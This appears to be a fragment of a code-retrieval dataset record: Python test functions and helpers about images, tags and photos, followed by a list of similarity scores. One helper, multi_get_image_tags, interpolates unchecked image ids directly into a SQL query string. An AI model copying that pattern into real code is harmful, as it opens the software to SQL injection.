self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def test_add_remove_withtag(self):\n record = self.good_record()\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n session = self.m.new_session(self.auth, self.system)\n i = self.query.copy()\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.m.lookup(session, i)\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_photo_classification_view_set_post_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n # 11 classifications are loaded by fixture\n self.assertEquals(len(classifications), 12)", "def test_emotion_is_created_and_attached_to_user(self):\n one_user = User.objects.last()\n\n emotion = EmotionFactory(user=one_user, anger=.1)\n emotion.save()\n\n self.assertEqual(one_user.emotions.first().anger, .1)", "def test_getImages(self): # GIVEN the group chat has at least one image\n testBot = bot.Bot(os.environ['bot_id'], os.environ['token'], os.environ['group_ID'])\n imageList = testBot.run() #AND THEN post_images calls the private get_images method which returns an array\n self.assertTrue(len(imageList) > 0) #THEN there should be at least one element in the array", "def test_user_photo_creation_succeeds(self):\n\t\timage_name = 'test1.png'\n\t\twith open(self.img_url, 'rb') as image:\t\t\t\n\t\t\tdata = {'image': image, 'name':image_name}\t\t\t\n\t\t\tresponse = self.client.post(reverse('photos'), data)\n\t\t\timage.close()\n\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\t\tself.assertEqual(response.data.get('name'), image_name)", "def tag_images(self, image_files, model=None):\n return self._multi_image_op(image_files, ['tag'], model=model)", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user, name = 'Vegan')\n tag2 = sample_tag(user=self.user, name = 'Dessert')\n payload = {\n 'title': 'Avocado lime Cheesecake',\n 'tags': [tag1.id, tag2.id], # this is how tags are assigned\n 'time_minutes': 20,\n 'price': 20.00,\n }\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)", "def test_retrieve_tags_assigned_unique(self):\n tag1 = Tag.objects.create(user = self.user,name='Breakfast')\n tag2 = Tag.objects.create(user=self.user,name='Lunch')\n\n recipe1 = Recipe.objects.create(user=self.user,title='Goose Liver on toast',price=5.00,time_minutes=15)\n recipe2 = Recipe.objects.create(user = self.user,title='Egg Benedict',price=5.00,time_minutes=15)\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag1)\n\n res = self.client.get(TAGS_URL,{'assigned_only':1})\n self.assertEqual(len(res.data),1)", "def multi_get_image_tags(self, owner_userid, image_ids, tag_type='owner'):\n\t\tif 
owner_userid:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\tfor id in image_ids:\n\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\tif tag_type == 'owner':\n\t\t\tinclude_clause = \"AND tag_userid = t2.owner_userid\"\n\t\telif tag_type == 'public':\n\t\t\tinclude_clause = \"AND tag_userid != t2.owner_userid\"\n\t\telif tag_type == 'all':\n\t\t\tinclude_clause = \"\"\n\t\t\t\n\t\timage_list = []\n\t\tfor id in image_ids:\n\t\t\timage_list.append(\"%s\" % id)\n\n\t\towner_clause = \"\"\n\t\tif owner_userid:\n\t\t\towner_clause = \"AND t2.owner_userid = %(owner_userid)s\"\n\t\tquery_args = {'owner_userid': owner_userid}\n\t\t\t\n\t\treturn self.app.db.query(\"\"\"\n\t\t\t\tSELECT\n\t\t\t\t\ttag_name,\n\t\t\t\t\tcount(*) AS cnt_images\n\t\t\t\tFROM\n\t\t\t\t\tuser_image_tags t1\n\t\t\t\t\tJOIN user_images t2 USING (image_id)\n\t\t\t\tWHERE\n\t\t\t\t\tt1.image_id in (%s)\n\t\t\t\t\t%s\n\t\t\t\t\t%s\n\t\t\t\tGROUP BY\n\t\t\t\t\ttag_name\n\t\t\t\tORDER BY\n\t\t\t\t\ttag_name asc\n\t\t\t\t\"\"\" % (','.join(image_list), owner_clause, include_clause), query_args)", "def test_add_remove_tag(self):\n record = self.good_record()\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n self.assertIsNotNone(id)\n before = self.images.find_one({'_id': id})\n self.assertIsNotNone(before)\n # Add a tag a make sure it worked\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n after = self.images.find_one({'_id': id})\n self.assertIsNotNone(after)\n self.assertIn('testtag', after['tag'])\n self.assertIn(self.tag, after['tag'])\n # Remove a tag and make sure it worked\n status = self.m.remove_tag(self.system, 'testtag')\n self.assertTrue(status)\n after = self.images.find_one({'_id': id})\n self.assertIsNotNone(after)\n self.assertNotIn('testtag', after['tag'])", "def test_upload_image(self):\n with open('apps/upload/tests/media/test.jpg') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(200, r.status_code)\n json_r = json.loads(r.content)\n eq_('success', json_r['status'])\n file = json_r['file']\n eq_('test.jpg', file['name'])\n eq_(90, file['width'])\n eq_(120, file['height'])\n name = '098f6b.jpg'\n message = 'Url \"%s\" does not contain \"%s\"' % (file['url'], name)\n assert (name in file['url']), message\n\n eq_(1, ImageAttachment.objects.count())\n image = ImageAttachment.objects.all()[0]\n eq_('pcraciunoiu', image.creator.username)\n eq_(150, image.file.width)\n eq_(200, image.file.height)\n eq_('question', image.content_type.model)\n eq_(1, image.object_id)", "def test_record_emotions_post_adds_emotion_to_db(self):\n from emotion_emotions.views import RecordEmotions\n num = len(Emotion.objects.all())\n request = self.request.post('', data={'image': 'data:base64,FAKE'})\n request.user = self.dan\n view = RecordEmotions(request=request)\n view.post(request)\n new_num = len(Emotion.objects.all())\n self.assertEqual(num + 1, new_num)", "def copy_images(apps, schema_editor):\n\n FieldImage = apps.get_model('field_wagtail', 'FieldImage')\n Image = apps.get_model('wagtailimages', 'Image')\n django_content_type = apps.get_model('contenttypes', 'contenttype')\n tagged_item_model = apps.get_model('taggit', 'TaggedItem')\n\n images = Image.objects.all()\n new_images = []\n for image in images:\n new_images.append(FieldImage(\n id=image.id,\n title=image.title,\n file=image.file,\n width=image.width,\n height=image.height,\n created_at=image.created_at,\n 
focal_point_x=image.focal_point_x,\n focal_point_y=image.focal_point_y,\n focal_point_width=image.focal_point_width,\n focal_point_height=image.focal_point_height,\n file_size=image.file_size,\n collection=image.collection,\n uploaded_by_user=image.uploaded_by_user,\n alt_text=''\n ))\n\n FieldImage.objects.bulk_create(new_images)\n\n ct_extended_model, created = django_content_type.objects.get_or_create(\n app_label='field_wagtail',\n model='fieldimage'\n )\n ct_wagtail_model = django_content_type.objects.get(\n app_label='wagtailimages',\n model='image'\n )\n\n tagged_item_model.objects.filter(\n content_type_id=ct_wagtail_model.id).update(\n content_type_id=ct_extended_model.id\n )", "def setUp(self):\n\n self.user_1 = User.objects.create_user(\n username='testuser', password='12345',\n email='[email protected]'\n )\n\n # self.profile_1 = Profile.objects.create(user=self.user_1,\n # image='profile_default.jpg')", "def test_upload_image(self):\n image = self.mock_master.get_imagelist(self.region1)[0]\n id = self.mock_master.upload_image(self.region2, image)\n found = False\n for i in self.mock_master.get_imagelist(self.region2):\n if i.id == id:\n self.assertEquals(i.region, self.region2.region)\n self.assertEquals(i.name, image.name)\n self.assertEquals(i.checksum, image.checksum)\n found = True\n break\n self.assertTrue(found)", "def test_signup_photo(self, mocked_sendy):\n url = '/0/chefs'\n data = {\n 'email': '[email protected]',\n 'password': 'secret',\n 'name': 'John',\n 'surname': 'Doe',\n 'language': 'es',\n 'photo': IMAGES['png'],\n }\n resp = self.client.post(url, data=data)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('auth', resp.data)\n self.assertIn('token', resp.data['auth'])\n # Check that the photo exists\n self.assertTrue(Chefs.objects.last().avatar_photos.all())", "def test_delete_image_by_wrong_tag(self, test_image):\n tag = f\"{TEST_IMAGE_NAME}:wrong_tag\"\n assert image_exists(TEST_IMAGE_NAME)\n assert not delete_image(tag, force=True)\n assert image_exists(TEST_IMAGE_NAME)\n\n # now delete using that tag, both tags will be gone because it's the same image.\n build_test_image(tag=tag)\n assert image_exists(TEST_IMAGE_NAME)\n assert image_exists(tag)\n assert delete_image(tag, force=True)\n assert not image_exists(TEST_IMAGE_NAME)\n assert not image_exists(tag)", "def test_image_obj_creado_con_exito(self):\n self.assertTrue(self.image_model.objects.get(pk=self.image_obj.pk))", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_comment_child = self.make_comment_data('test_child_comment', self.comment_id, children=[])\n cs_comment = self.make_comment_data(self.comment_id, None, [cs_comment_child])\n cs_thread = make_minimal_cs_thread({\n 'id': self.thread_id,\n 'course_id': str(self.course.id),\n 'children': [cs_comment],\n })\n self.register_get_thread_response(cs_thread)\n self.register_get_comment_response(cs_comment)\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {'requested_fields': 'profile_image'})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_get_photos_paging(self):\n pass", "def test_add_remove_two(self):\n 
record = self.good_record()\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n record['id'] = 'fakeid2'\n record['tag'] = []\n id2 = self.images.insert(record.copy())\n\n status = self.m.add_tag(id2, self.system, self.tag)\n self.assertTrue(status)\n rec1 = self.images.find_one({'_id': id1})\n rec2 = self.images.find_one({'_id': id2})\n self.assertNotIn(self.tag, rec1['tag'])\n self.assertIn(self.tag, rec2['tag'])", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def addImageSuggestion(self, item, metadata):\n claims = item.get().get('claims')\n\n if not metadata.get(u'imageurl'):\n # Nothing to add\n return\n if u'P4765' in claims:\n # Already has a suggestion\n return\n\n if u'P18' in claims:\n newimage = requests.get(metadata.get(u'imageurl'), stream=True)\n if not newimage.headers.get('Content-length'):\n return\n if not newimage.headers.get('Content-length').isnumeric():\n return\n newimagesize = int(newimage.headers['Content-length'])\n #print (u'Size of the new image is %s according to the headers' % (newimagesize,))\n if newimagesize < 500000:\n # Smaller than 500KB is just too small to bother check to replace\n return\n\n for imageclaim in claims.get(u'P18'):\n currentsize = imageclaim.getTarget().latest_file_info.size\n #print (u'Size of the current image is %s' % (currentsize,))\n # New image should at least be 4 times larger\n if currentsize * 4 > newimagesize:\n return\n\n newclaim = pywikibot.Claim(self.repo, u'P4765')\n newclaim.setTarget(metadata[u'imageurl'])\n pywikibot.output('Adding commons compatible image available at URL claim to %s' % item)\n item.addClaim(newclaim)\n\n if metadata.get(u'imageurlformat'):\n newqualifier = pywikibot.Claim(self.repo, u'P2701')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurlformat')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n newqualifier = pywikibot.Claim(self.repo, u'P2699')\n newqualifier.setTarget(metadata[u'describedbyurl'])\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('title'):\n if metadata.get('title').get(u'en'):\n title = pywikibot.WbMonolingualText(metadata.get('title').get(u'en'), u'en')\n else:\n lang = list(metadata.get('title').keys())[0]\n title = pywikibot.WbMonolingualText(metadata.get('title').get(lang), lang)\n newqualifier = pywikibot.Claim(self.repo, u'P1476')\n newqualifier.setTarget(title)\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('creatorname'):\n newqualifier = pywikibot.Claim(self.repo, u'P2093')\n newqualifier.setTarget(metadata.get('creatorname'))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if 
metadata.get(u'imageurllicense'):\n newqualifier = pywikibot.Claim(self.repo, u'P275')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurllicense')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(self.user)\n tag2 = sample_tag(self.user, name='Fatty food')\n payload = {\n 'title': 'Cheescake',\n 'time_minutes': 49,\n 'price': 30,\n 'tags': [tag1.id, tag2.id]\n }\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)\n # Remove probably\n serializer = RecipeDetailSerializer(recipe)\n res = self.client.get(detail_url(recipe.id))\n self.assertEqual(res.data, serializer.data)", "def test_create_recipe_with_tag(self):\n tag1 = sample_tag(user=self.user, name = 'Vegen')\n tag2 = sample_tag(user=self.user, name='Dessert')\n\n payload = {\n 'title': 'Avocado lime cheescake',\n 'tags' : [tag1.id, tag2.id],\n 'time_minuts': 50,\n 'price': 400\n }\n\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n self.assertEqual(tags.count(),2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2,tags)", "def test_activity_photos(self):\n activity = self.client.get_activity(152668627)\n self.assertTrue(activity.photo_count > 0)\n photos = list(activity.photos)\n self.assertEqual(len(photos), 1)\n self.assertEqual(len(photos), activity.photo_count)\n self.assertIsInstance(photos[0], model.ActivityPhoto)", "def test_single_image_with_special_tag(self, client, tag):\n train_id = gbl.get_train_ids()[0]\n params = dict(train_id=train_id, tag=tag, step=1)\n url = get_url(BASE_URL, params)\n\n response = client.get(url)\n assert response.status_code == 400\n\n response = response.get_json()\n assert response['error_code'] == '5054500D'\n assert response['error_msg'] == \"Image is not exist. Detail: Invalid parameter value. 
\" \\\n \"Can not find any data in this train job by given tag.\"", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def test_create_thumbnails(self):\n \n logging.info('create_thumbnail')\n \n for size in self.article.sizes.keys():\n assert not self.article.thumbnail_exists(size)\n\n self.article.image.save('avatar.png', ContentFile(self.image.read()))\n self.article.create_thumbnails()\n \n for size in self.article.sizes.keys():\n assert self.article.thumbnail_exists(size)", "def test_answer_meta_image_uses_category_image_if_no_social_image(self):\n category = baker.make(Category, category_image=self.test_image)\n page = self.page1\n page.category.add(category)\n page.save_revision()\n self.assertEqual(page.meta_image, self.test_image)", "def test_get_image_id(self):\n img_id = str(uuid.uuid4())\n img_name = 'myfakeimage'\n self.my_image.id = img_id\n self.my_image.name = img_name\n self.sahara_client.images.get.return_value = self.my_image\n self.sahara_client.images.find.side_effect = [[self.my_image], []]\n\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_id))\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_image_id, 'noimage')\n\n calls = [mock.call(name=img_name),\n mock.call(name='noimage')]\n self.sahara_client.images.get.assert_called_once_with(img_id)\n self.sahara_client.images.find.assert_has_calls(calls)", "def add_tag_image_data(video_id, info, image_analysis_id):\n\n tags = info['tags'] # tags is a dictionary\n for tag_to_add in tags:\n tag_id = Tag.query.filter(Tag.tag == tag_to_add).first().tag_id\n if not TagImage.query.filter(TagImage.tag_id == tag_id,\n TagImage.image_analysis_id == image_analysis_id).first():\n tag_image = TagImage(tag_id=tag_id, \n image_analysis_id=image_analysis_id)\n db.session.add(tag_image)\n\n try:\n db.session.commit()\n except (Exception, exc.SQLAlchemyError, exc.InvalidRequestError, exc.IntegrityError) as e:\n print(hex_code + '\\n' + str(e))", "def testimage_handler(self):\n\t\t\n\t\tthings = Thing.objects.all()\n\t\tif len( things ):\n\t\t\tthing = things[0]\n\t\telse:\n\t\t\tc = Client()\n\t\t\tdata = parse_qs( 'title=&tags=&lattitude=32.82248&longitude=-96.762986&duration=&parent=&privacy=U&lifespan=&format=txt' )\n\t\t\tdata[ 'media' ] = open( MEDIA_ROOT + 'unittest_image.jpg' )\n\t\t\tc.post( '/api/place/', data )\n\t\t\t\n\t\t\tthing = Thing.objects.all()[0]\n\n\t\t\n\t\turi = thing.media.replace( 'http://' + DOMAIN, '' )\n\t\t\n\t\tc = Client()\n\t\tresponse = c.get( uri )\n\t\tself.failUnlessEqual(response.status_code, 200)", "def test_deletion_of_user_photo_succeeds(self):\n\t\tself.name = 'media.png'\n\t\tself.image = File(open('static/img/media.png', 'rb'))\n\t\tself.created_image = UserPhoto(image=self.image, name=self.name, created_by=self.user)\n\t\tself.created_image.save()\t\t\t\n\t\tresponse = self.client.delete('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)", "def test_profile_made(self):\n self.assertTrue(ImagerProfile.objects.count() == 5)", "def simple_test(self, img, img_meta, **kwargs):\n pass" ]
[ "0.6760434", "0.6466026", "0.6373129", "0.620715", "0.61913586", "0.61831266", "0.6162001", "0.61448395", "0.61397374", "0.61137104", "0.6010534", "0.60070205", "0.59996825", "0.5987241", "0.59855795", "0.59617376", "0.5952365", "0.5951813", "0.594541", "0.5944202", "0.594388", "0.5938778", "0.5908311", "0.58899283", "0.5887875", "0.58775014", "0.5873002", "0.5817553", "0.581176", "0.5800704", "0.5797769", "0.5793435", "0.5788559", "0.5777796", "0.5743501", "0.57356584", "0.57355756", "0.5718911", "0.57132906", "0.5711784", "0.5698263", "0.5697285", "0.5688512", "0.56779605", "0.56712765", "0.5667953", "0.564997", "0.5641534", "0.563462", "0.5631831", "0.5629539", "0.5616728", "0.5615126", "0.5610671", "0.56048", "0.5596394", "0.55918837", "0.5587666", "0.55775875", "0.5574589", "0.5573034", "0.5570159", "0.5564582", "0.55635875", "0.5555989", "0.5555821", "0.5544566", "0.5541567", "0.55396336", "0.5536949", "0.5536486", "0.5530501", "0.55072975", "0.55066246", "0.549478", "0.5484947", "0.5478954", "0.54772854", "0.54712355", "0.54708385", "0.546385", "0.5459219", "0.5447773", "0.544612", "0.54331833", "0.5416847", "0.5415203", "0.5414359", "0.54118705", "0.540894", "0.5404497", "0.540186", "0.5401767", "0.5391652", "0.5379118", "0.53784966", "0.53718764", "0.53657657", "0.53592235", "0.5348482" ]
0.57373446
35
Image (m)(m)> Tag > UserProfile > User
e.g. see factory.create_tags_images for the creation of the below items
> We'll assert that populating related data on the m2m field
> constructs the expect
> retrieves the correct results
> doesn't retrieve the incorrect results
Image.pk  Image.name  Tag.name  company  user
i         grass       green     x        y
i         grass       blue      x        y
k         sun         yellow    x        y
l         grass       green     q        l
m         sun         green     q        l
def test_m2m_dependent_object_import_precision(self):  #: TODO: Come up with a better name
    other_company = Company.objects.create(name='Other Co', natural_id='oc')
    _, other_user_profile = create_base_models(username='other', company=other_company)

    #: Create same named tags <-- assert later that they do not get filtered out as they are from a different
    #: company
    blue = Tag.objects.create(
        company=other_company,
        created_by=other_user_profile,
        name='blue',
        slug='blue',
        rank=0
    )
    green = Tag.objects.create(
        company=other_company,
        created_by=other_user_profile,
        name='green',
        slug='green',
        rank=2
    )

    user_profile: UserProfile = self.user_profiles[0]  # See self.setUp()

    # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************
    # Initialize Importers
    image_manager = ImporterManager(importer=ImageImporter())
    tag_manager = ImporterManager(importer=TagImporter())
    up_manager = ImporterManager(importer=UserProfileImporter())
    company_manger = ImporterManager(importer=CompanyImporter())
    user_manager = ImporterManager(importer=UserImporter())

    # Populate leaf models of dependency tree with kv data
    for row, image in enumerate(self.images):
        user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)
        company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)

    #: Retrieve data associated with kv data
    user_manager.get_available_rows()
    company_manger.get_available_rows()

    #: Populate data up the dependency tree with retrieved rows
    for row, image in enumerate(self.images):
        up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)
        up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)

    #: Retrieve data associated with models depended upon
    up_manager.get_available_rows()

    tag_manager.update_kvs('slug', 'blue', row=0, col=0)
    tag_manager.update_kvs('slug', 'green', row=0, col=1)
    #: Anyway to avoid pushing these redundant kvs accross a row (??)
    tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)
    # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1)
    tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)
    # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1)

    tag_manager.update_kvs('slug', 'yellow', row=1, col=0)
    tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)
    tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)

    #: Retrieve associate intermediate data
    tag_manager.get_available_rows()

    self.assertEqual(len(tag_manager.get_object_or_list(0)), 2)
    for tag in tag_manager.get_object_or_list(0):
        self.assertEqual(tag.company_id, self.company.id)
        self.assertNotEqual(tag.company_id, other_company.id)

    self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_image(self):\n\n image = Image.query.filter(Image.tag1 == \"Denali\").first()\n self.assertEqual(image.tag1, \"Denali\")", "def test_users_photos_view_set_get_own_photos(self):\n # Create user and data\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_aov_web_user_view_get_successful(self):\n # Create test data\n # weight of 1\n user = account_models.User.objects.create_user(age=25, email='[email protected]', first_name='Martin',\n last_name='Ronquillo', location='Boise',\n social_name='@ronquilloaeon', password='pass',\n username='aov_hov')\n # weight of 6\n other_user = account_models.User.objects.create_user(email=\"[email protected]\", password=\"test\", username=\"testy\")\n category = PhotoClassification.objects.create_or_update(name='Test', classification_type='category')\n\n\n photo1 = Photo(image=Image(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n PhotoComment.objects.create_or_update(photo=photo1, comment=\"Nice one!\", user=other_user)\n\n photo2 = Photo(image=Image(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=other_user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n request = APIClient().get('/api/aov-web/users/top', format='json')\n results = request.data[\"results\"]\n\n self.assertEqual(len(results), 2)\n self.assertEqual(results[0][\"id\"], other_user.id)\n self.assertEqual(results[1][\"id\"], user.id)", "def test_album_image_user(self):\n self.assertEqual(self.album.user, self.photo.user)", "def test_ingredients_by_id_image(self):\n pass", "def test_images(self):\n\n message = {\"method\": \"images\", \"params\": {\"elem\": None}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"images\")\n self.assertIsInstance(response[\"result\"], list)\n\n images = [i[\"tag\"] for i in response[\"result\"]]\n\n self.assertIn(self.tag_image, images)", "def test_get_owner_image(self):\n\n # user1 is owner of image_id 1\n # user2 is owner of image ids (2,3)\n for image_id in range(1, 4):\n url = reverse(self.url_name_one, args=(image_id,))\n if image_id == 1:\n self.client.force_authenticate(self.user1)\n else:\n self.client.force_authenticate(self.user2)\n\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, 
status.HTTP_200_OK)\n if image_id == 1:\n self.assertEqual(response.data[\"owner\"], \"user1\")\n else:\n self.assertEqual(response.data[\"owner\"], \"user2\")\n\n # user2 try to get image_id 1 which is owner user1\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.get(url, format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_users_photos_view_set_get_successful(self):\n # Create user and data\n access_user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='m')\n user = account_models.User.objects.create_user(email='[email protected]', password='pass', username='aov_hov')\n category = photo_models.PhotoClassification.objects\\\n .create_or_update(name='Test', classification_type='category')\n\n photo1 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo1-min.jpg', 'rb')), user=user)\n photo1.save()\n photo1.category.set([category])\n photo1.save()\n\n photo2 = photo_models.Photo(image=Photo(open('apps/common/test/data/photos/photo2-min.jpg', 'rb')), user=user)\n photo2.save()\n photo2.category.set([category])\n photo2.save()\n\n # Simulate auth\n token = test_helpers.get_token_for_user(access_user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/users/{}/photos'.format(user.id), format='json')\n result = request.data['results']\n\n self.assertEquals(request.status_code, 200)\n self.assertEquals(len(result), 2)\n self.assertEquals(result[0]['id'], photo2.id) # newest first\n self.assertIn('dimensions', result[0])\n self.assertIn('image_blurred', result[0])\n self.assertIn('image', result[0])", "def test_list_image_metadata(self):\n pass", "def test_add_to_bag(self):\n user = User.objects.create(username='test')\n image = Image.objects.create(\n img_title='test', base_price=0, user_id=user)\n bag = {image.id: 1}\n response = self.client.post('/images/', bag)\n self.assertEqual(response.status_code, 200)", "def test_retrieval_of_user_photos(self):\t\n\t\tget_response = self.client.get(reverse('photos'))\n\n\t\tself.assertEqual(get_response.status_code, status.HTTP_200_OK)\n\t\tdata = [i.values() for i in get_response.data]\n\t\tself.assertIn(u'{}'.format(self.image_name), data[0])", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def test_list_image(self):\n pass", "def images_init(self):\n\n 
self.user_image = UserImage(\n user_id=self.user_id,\n tag=self.tag_image,\n image_id='sha256:342fea22',\n created=1524229897,\n size=191623983\n )\n self.user_image.save()\n\n CLIENT.images_list.append(\n {'Containers': -1,\n 'Created': 1524229897,\n 'Id': 'sha256:342fea22',\n 'Labels': None,\n 'ParentId': 'sha256:55d98c2',\n 'RepoDigests': None,\n 'RepoTags': [self.tag_image],\n 'SharedSize': -1,\n 'Size': 191623983,\n 'VirtualSize': 191623983}\n )", "def setUp(self):\n # slugify_unique should return 'foo\n # so image names would be just 'foo.jpg'\n with mock.patch.object(\n models,\n 'slugify_unique',\n return_value='foo'\n ):\n # create an image attached to the content object\n self.image = models.Image.objects.create(\n image=get_image_in_memory_data(),\n position=0,\n content_type=ContentType.objects.get_for_model(TestModel),\n object_id=self.object.id\n )\n # load created image from the database\n # it's necessary because the Image.image value differs\n # in loaded images (the field adds the path while saving)\n # created image: foo.jpg\n # loaded image: gallery/foo.jpg\n self.image = self.get_image()", "def test_user_photo_retrieval_by_id_succeeds(self):\n\t\t# url = reverse('photodetail')\t\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, 